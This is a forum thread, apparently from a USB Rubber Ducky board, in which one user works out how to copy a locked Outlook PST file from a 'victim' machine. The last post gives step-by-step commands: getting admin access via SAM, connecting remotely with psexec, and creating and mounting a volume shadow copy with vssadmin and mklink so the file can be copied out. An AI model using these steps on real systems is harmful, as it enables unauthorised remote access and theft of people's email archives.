Jump to content

[Question] Copy Locked File(s)

0xFFFF

By 0xFFFF
in Classic USB Rubber Ducky

 Share

Recommended Posts

0xFFFF Newbie

0xFFFF

Posted
Posted

In my experience I have had a little difficulty duplicating files that are locked by other processes. One method I've used is to forcably release the file and then commence copying. This option is ok but often causes the process to crash. The other method I've used is volume shadow copy. This method is ok if the service is enabled and you don't want the latest changes.

Both options have major disadvantages and I was wondering if anyone might have a better method?

The target in my test scenario has been the users outlook PST.

Link to comment
Share on other sites
0xFFFF Newbie

0xFFFF

Posted
  • Author
Posted

Not sure if anyone is interested in this but I've made progress. Most are probably already familiar with PsExec. What I've done is used that to silently create a VSC of the the PST on demand which can then be 'restored' and copied or moved from the victims machine. The process will take time due to the size of the PST. I've been working with ~700MB - 1.4GB files.

Link to comment
Share on other sites
  • 5 months later...
0xFFFF Newbie

0xFFFF

Posted
  • Author
Posted

RaiseFromDead.jpeg

...Ok. I'm raising this one from the dead. This topic hasn't been one of those super important projects, hence the really late post.

The best method (IMO) is to use VSC. So far it's worked on all the machines I've tested. In situations where programs are missing, I've simply copied them or used the -c option in psexec.exe. Don't forget you need to authenticate either using psexec or when opening the command prompt.

Step 1. Get Admin access using SAM or whatever.

Step 2. Remote to victim

psexec \\remotemachine.somedomain.com cmd

Step 3. See if VSC is working

vssadmin list shadows

If it is, make a note of the desired VSC and skip to
Step 5.

Step 4. Create a VSC

vssadmin create shadow /for=C:

Go back to
Step 3.

Step 5. Mount the desired VSC

mklink /d "C:\VSCmountpoint" \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopyXXX\

Where VSCmountpoint is a folder anywhere on the system and HarddiskVolumeShadowCopyXXX is the VSC you want to mount.

Step 6. Copy stuff

xcopy / copy / whatever the file wherever you want.

Step 7. Unmount VSC

rmdir C:\VSCmountpoint

Step 8. Eat pizza.

Questions?

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
 Share
Go to topic listing

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...